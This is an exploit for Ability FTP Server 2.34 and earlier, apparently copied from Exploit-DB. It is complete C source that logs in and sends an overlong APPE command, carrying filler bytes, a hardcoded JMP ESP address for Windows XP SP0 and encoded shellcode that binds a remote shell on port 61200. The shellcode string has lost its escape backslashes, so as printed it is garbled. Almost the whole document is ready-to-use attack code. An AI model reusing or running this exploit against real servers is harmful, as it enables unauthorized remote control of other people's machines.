https://www.exploit-db.com/exploits/693

漏洞细节尚未披露

/*

TESTED ON WINXP SP0 RUS

(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru

HAPPY NEW YEAR!

Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...

*/

#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

// shellc0de by m00 team  bind 61200
char shellcode[]=
"x90x90x90x90x90xEBx0Fx58x80x30xBBx40x81x38x6D"
"x30x30x21x75xF4xEBx05xE8xECxFFxFFxFFx52xD7xBA"
"xBBxBBxE6xEEx8Ax60xDFx30xB8xFBx28x30xF8x44xFB"
"xCEx42x30xE8xB8xDDx8Ax69xDDx03xBBxABxDDx3Ax81"
"xF6xE1xCFxBCx92x79x52x49x44x44x44x32x68x30xC1"
"x87xBAx6CxB8xE4xC3x30xF0xA3x30xC8x9Bx30xC0x9F"
"xBAx6DxBAx6Cx47x16xBAx6Bx2Dx3Cx46xEAx8Ax72x3B"
"x7AxB4x48x1DxC9xB1x2DxE2x3Cx46xCFxA9xFCxFCx59"
"x5Dx05xB4xBBxBBxBBx92x75x92x4Cx52x53x44x44x44"
"x8Ax7BxDDx30xBCx7Ax5BxB9x30xC8xA7xBAx6DxBAx7D"
"x16xBAx6Bx32x7Dx32x6CxE6xECx36x26xB4xBBxBBxBB"
"xE8xECx44x6Dx36x26xE8xBBxBBxBBxE8x44x6Bx32x7C"
"x36x3ExE1xBBxBBxBBxEBxECx44x6Dx36x36x2CxBBxBB"
"xBBxEAxD3xB9xBBxBBxBBx44x6Bx36x26xDExBBxBBxBB"
"xE8xECx44x6Dx8Ax72xEAxEAxEAxEAxD3xBAxBBxBBxBB"
"xD3xB9xBBxBBxBBx44x6Bx32x78x36x3ExCBxBBxBBxBB"
"xEBxECx44x6DxD3xABxBBxBBxBBx36x36x38xBBxBBxBB"
"xEAxE8x44x6Bx36x3ExCExBBxBBxBBxEBxECx44x6DxD3"
"xBAxBBxBBxBBxE8x44x6Bx36x3ExC7xBBxBBxBBxEBxEC"
"x44x6Dx8Ax72xEAxEAxE8x44x6BxE4xEBx36x26xFCxBB"
"xBBxBBxE8xECx44x6DxD3x44xBBxBBxBBxD3xFBxBBxBB"
"xBBx44x6Bx32x78x36x36x93xBBxBBxBBxEAxECx44x6D"
"xE8x44x6BxE3x32xF8xFBx32xF8x87x32xF8x83x7CxF8"
"x97xBAxBAxBBxBBx36x3Ex83xBBxBBxBBxEBxECx44x6D"
"xE8xE8x8Ax72xEAxEAxEAxD3xBAxBBxBBxBBxEAxEAx36"
"x26x04xBBxBBxBBxE8xEAx44x6Bx36x3ExA7xBBxBBxBB"
"xEBxECx44x6Dx44x6Bx53x34x45x44x44xFCxDExCFxEB"
"xC9xD4xD8xFAxDFxDFxC9xDExC8xC8xBBxF7xD4xDAxDF"
"xF7xD2xD9xC9xDAxC9xC2xFAxBBxFExC3xD2xCFxEBxC9"
"xD4xD8xDExC8xC8xBBxFCxDExCFxE8xCFxDAxC9xCFxCE"
"xCBxF2xD5xDDxD4xFAxBBxF8xC9xDExDAxCFxDExEBxC9"
"xD4xD8xDExC8xC8xFAxBBxFCxD7xD4xD9xDAxD7xFAxD7"
"xD7xD4xD8xBBxCCxC8x89xE4x88x89xBBxECxE8xFAxE8"
"xCFxDAxC9xCFxCExCBxBBxECxE8xFAxE8xD4xD8xD0xDE"
"xCFxFAxBBxD9xD2xD5xDFxBBxD7xD2xC8xCFxDExD5xBB"
"xDAxD8xD8xDExCBxCFxBBxB9xBBx54xABxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBAxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxD8xD6xDFxBBx6Dx30x30x21";


int conn(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    WSADATA wsa;
    struct sockaddr_in sa;

    WSAStartup(MAKEWORD(2,0), &wsa);
    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf("gethostbyname() error!n"); exit(0);
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)      {
        printf("socketn");
        exit(0);
        }
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
        {printf("connect() error!n");
        exit(0);
          }
    printf("connected to %sn", host);
    return sock;
}


void login(int sock, char *login, char *pass)
{

FILE *file;
char ubuf[1000], pbuf[1000], rc[200];
int i;
char bochka[2000], med[2000];

file = fopen("bochka.txt", "w+");

      memset(bochka, 0x00, 2000);
      memset(bochka, 0x43, 1000);
      *(long*)&bochka[969] = 0x77F5801C; // ntdll.dll JMP ESP ADDR...
      memcpy(bochka+strlen(bochka), &shellcode, sizeof(shellcode));

      sprintf(med, "APPE %srn", bochka);
      fprintf(file, "%s", med);

      if ( strlen(pass) >= 100 )  { printf("2 long password!n"); exit(0); }
      if ( strlen(login) >= 100 ) { printf("2 long login!n"); exit(0);    }

      sprintf(ubuf, "USER %srn", login);
      send(sock, ubuf, strlen(ubuf), 0);
      printf("USER sending...n");
      Sleep(1000);
      printf("OK!n");

      sprintf(pbuf, "PASS %srn", pass);
      send(sock, pbuf, strlen(pbuf), 0);
      printf("PASS sending...n");
      Sleep(1000);
      recv(sock, rc, 200, 0);
      if ( strstr(rc, "530")) {printf("Bad password!n"); exit(0); }
      printf("OK!n");
      Sleep(1000);
      printf("Sending 604KY C MEDOM!n");
      send(sock, med, strlen(med), 0);
      Sleep(1000);
      printf("TrY To CoNnEcT tO...nn");

}

int main(int argc, char **argv)
{
    int sock = 0;
    int data;
    printf("nAbility FTP Server <= 2.34 R00T exploitn");
    printf("by Dark Eagle [ unl0ck team ]nhttp://unl0ck.void.runn");

    if ( argc < 4 ) { printf("usage: un-aftp.exe <host> <username> <password>nn"); exit(0); }

    sock = conn(argv[1], 21);
    login(sock, argv[2], argv[3]);
    closesocket(sock);
    Sleep(2000);

    return 0;
}

//Reference:
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit 	
//KaGra
//http://www.milw0rm.com/id.php?id=592 (https://www.exploit-db.com/exploits/592/)

// milw0rm.com [2004-12-16]